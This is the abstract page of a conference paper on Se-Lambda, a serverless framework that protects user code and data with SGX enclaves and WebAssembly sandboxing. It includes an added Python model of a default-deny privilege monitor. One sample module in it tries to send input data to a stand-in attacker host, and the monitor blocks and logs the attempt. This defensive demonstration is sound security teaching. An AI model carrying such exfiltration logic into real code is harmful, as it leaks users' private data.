Se-Lambda: Securing Privacy-Sensitive Serverless Applications Using SGX Enclave

  • Weizhong Qiang
  • Zezhao Dong
  • Hai Jin
Conference paper
Part of the Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering book series (LNICST, volume 254)

Abstract

Serverless computing is an emerging trend in the cloud and represents a new paradigm for deploying applications and services. In a serverless computing framework, cloud users can deploy arbitrary code and process data on the service runtime. However, since neither cloud users nor cloud providers can be assumed trustworthy, a serverless computing platform suffers from trust issues caused by both sides. In this paper, we propose a new serverless computing framework called Se-Lambda, which protects the API gateway with an SGX enclave and protects the service runtime with a two-way sandbox that combines an SGX enclave with a WebAssembly sandboxed environment. In the proposed service runtime, users’ untrusted code is confined by the WebAssembly sandbox, while the SGX enclave prevents a malicious cloud provider from stealing users’ privacy-sensitive data. In addition, we implement a privilege monitoring mechanism inside the SGX enclave to manage the access control of users’ function modules. We implement a prototype of Se-Lambda based on the open source project OpenLambda. The experimental results show that Se-Lambda imposes a low performance penalty while providing a significantly higher level of security.
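The abstract describes a privilege monitor on the trusted side that mediates what a user's function module may do. The following Python is an added example written for this page, not Se-Lambda's or OpenLambda's code: it models that reference-monitor pattern with a default-deny per-module policy, an import table bound to the module's identity (so a module cannot pass another module's id), a trusted-side key that is used on the module's behalf but never handed to it, and an audit trail of every decision. The capability names, policies, key and sample modules are all constructed for the example; the SGX enclave and the WebAssembly runtime that enforce this boundary in the real system are not reproduced here.

```python
"""Privilege-monitor model for untrusted function modules (added example)."""
import hashlib
import hmac
from dataclasses import dataclass


class PrivilegeDenied(PermissionError):
    """Raised when a module calls a host capability its policy does not grant."""


@dataclass(frozen=True)
class ModulePolicy:
    """Capabilities granted to one function module (names are this example's assumption)."""
    module_id: str
    allowed: frozenset


class PrivilegeMonitor:
    """Single choke point through which sandboxed modules reach host services.

    Models the trusted side of the two-way sandbox: it holds the secret key,
    enforces a default-deny policy per module and records every decision.
    """

    def __init__(self, policies, secret_key):
        self._policies = {p.module_id: p for p in policies}
        self._key = secret_key   # stays on the trusted side; never returned to a module
        self.audit = []          # (module_id, capability, decision)

    def _check(self, module_id, capability):
        policy = self._policies.get(module_id)
        allowed = policy is not None and capability in policy.allowed
        self.audit.append((module_id, capability, "allow" if allowed else "deny"))
        if not allowed:
            raise PrivilegeDenied(f"{module_id} may not use {capability}")

    # Host capabilities exposed to modules; each one is gated by _check.
    def read_input(self, module_id, request):
        self._check(module_id, "read_input")
        return request["payload"]

    def mac(self, module_id, data):
        """Authenticate data with the trusted-side key without exposing the key."""
        self._check(module_id, "mac")
        return hmac.new(self._key, data, hashlib.sha256).digest()

    def net_send(self, module_id, host, data):
        self._check(module_id, "net_send")
        return len(data)   # constructed stand-in; a real host would transmit


def make_imports(monitor, module_id):
    """Build the import table a module sees.

    Every entry is bound to the module's identity here, so a module cannot
    pass a different id to impersonate a more privileged module.
    """
    return {
        "read_input": lambda request: monitor.read_input(module_id, request),
        "mac": lambda data: monitor.mac(module_id, data),
        "net_send": lambda host, data: monitor.net_send(module_id, host, data),
    }


def run_module(monitor, module_id, module_fn, request):
    """Invoke an untrusted module with only its import table; denials become a 403."""
    imports = make_imports(monitor, module_id)
    try:
        return {"status": 200, "body": module_fn(imports, request)}
    except PrivilegeDenied as exc:
        return {"status": 403, "body": str(exc)}


# Constructed sample modules standing in for user-supplied function code.
def tag_module(imports, request):
    """Well-behaved module: reads its input and returns an authentication tag."""
    data = imports["read_input"](request)
    return imports["mac"](data).hex()


def exfil_module(imports, request):
    """Misbehaving module: tries to ship the input to an outside host."""
    data = imports["read_input"](request)
    imports["net_send"]("attacker.invalid", data)
    return "sent"


def demo():
    monitor = PrivilegeMonitor(
        policies=[
            ModulePolicy("tag", frozenset({"read_input", "mac"})),
            ModulePolicy("exfil", frozenset({"read_input"})),   # no network grant
        ],
        secret_key=b"constructed-trusted-side-key",
    )
    request = {"payload": b"cat.jpg"}
    ok = run_module(monitor, "tag", tag_module, request)
    denied = run_module(monitor, "exfil", exfil_module, request)
    return ok, denied, monitor.audit


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The design point worth carrying over to a real runtime is that the module never receives the key or a raw syscall surface: it sees only closures already bound to its own identity, and every host call passes through one check that logs before it decides, so a denied call is both blocked and visible to the operator.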

Keywords

Serverless computing · Cloud security · Runtime security · Intel SGX · WebAssembly

Notes

Acknowledgment

This work is supported by National Basic Research Program of China (973 Program) under grant No. 2014CB340600, National Natural Science Foundation of China under grant No. 61772221, and the Shenzhen Fundamental Research Program under grant No. JCYJ20170413114215614.

Copyright information

© ICST Institute for Computer Sciences, Social Informatics and Telecommunications Engineering 2018

Authors and Affiliations

  1. Services Computing Technology and System Lab, Cluster and Grid Computing Lab, Big Data Technology and System Lab, School of Computer Science and Technology, Huazhong University of Science and Technology, Wuhan, China